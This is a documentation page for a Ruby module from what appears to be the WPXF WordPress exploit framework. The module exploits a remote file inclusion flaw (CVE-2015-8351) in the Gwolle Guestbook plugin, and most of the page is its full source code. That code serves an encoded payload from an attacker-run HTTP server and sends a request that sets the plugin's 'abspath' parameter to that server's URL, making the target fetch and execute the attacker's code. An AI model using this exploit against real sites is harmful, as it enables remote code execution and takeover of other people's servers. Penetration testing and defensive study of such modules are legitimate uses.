class Wpxf::Exploit::GwolleGuestbookRemoteFileInclusion
Public Class Methods
new()
click to toggle source
Calls superclass method
Wpxf::Net::HttpServer::new
# File lib/wpxf/modules/exploit/rfi/gwolle_guestbook_remote_file_inclusion.rb, line 7 def initialize super update_info( name: 'Gwolle Guestbook Remote File Inclusion', desc: 'The Gwolle Guestbook plugin, in versions 1.5.3 and below, '\ 'allows for remote file inclusion and remote code execution. '\ 'This exploit only works when the PHP option "allow_url_include" '\ 'is enabled (disabled by default).', author: [ 'High-Tech Bridge Security Research Lab', # Vulnerability disclosure 'rastating' # WPXF module ], references: [ ['CVE', '2015-8351'], ['EDB', '38861'] ], date: 'Nov 04 2015' ) register_options([ StringOption.new( name: 'rfi_host', desc: 'The address of the host listening for a connection', required: true ), StringOption.new( name: 'rfi_path', desc: 'The path to access via the remote file inclusion request', default: Utility::Text.rand_alpha(8), required: true ) ]) end
Public Instance Methods
check()
click to toggle source
# File lib/wpxf/modules/exploit/rfi/gwolle_guestbook_remote_file_inclusion.rb, line 46 def check check_plugin_version_from_readme('gwolle-gb', '1.5.4') end
on_http_request(path, params, headers)
click to toggle source
# File lib/wpxf/modules/exploit/rfi/gwolle_guestbook_remote_file_inclusion.rb, line 62 def on_http_request(path, params, headers) payload.encoded end
plugin_url()
click to toggle source
# File lib/wpxf/modules/exploit/rfi/gwolle_guestbook_remote_file_inclusion.rb, line 42 def plugin_url normalize_uri(wordpress_url_plugins, 'gwolle-gb') end
rfi_host()
click to toggle source
# File lib/wpxf/modules/exploit/rfi/gwolle_guestbook_remote_file_inclusion.rb, line 50 def rfi_host normalized_option_value('rfi_host') end
rfi_path()
click to toggle source
# File lib/wpxf/modules/exploit/rfi/gwolle_guestbook_remote_file_inclusion.rb, line 54 def rfi_path normalized_option_value('rfi_path') end
rfi_url()
click to toggle source
# File lib/wpxf/modules/exploit/rfi/gwolle_guestbook_remote_file_inclusion.rb, line 58 def rfi_url "http://#{rfi_host}:#{http_server_bind_port}/#{rfi_path}" end
run()
click to toggle source
Calls superclass method
Wpxf::Module#run
# File lib/wpxf/modules/exploit/rfi/gwolle_guestbook_remote_file_inclusion.rb, line 70 def run return false unless super start_http_server(true) emit_info 'Executing request...' res = execute_get_request( url: vulnerable_url, params: { 'abspath' => rfi_url } ) stop_http_server emit_info "Response code: #{res.code}", true emit_info "Response body: #{res.body}", true if res.body =~ /allow_url_include/ emit_error 'allow_url_include appears to be disabled' return false end if res && !res.body.strip.empty? emit_success "Result: #{res.body}" end true end
vulnerable_url()
click to toggle source
# File lib/wpxf/modules/exploit/rfi/gwolle_guestbook_remote_file_inclusion.rb, line 66 def vulnerable_url normalize_uri(plugin_url, 'frontend', 'captcha', 'ajaxresponse.php') end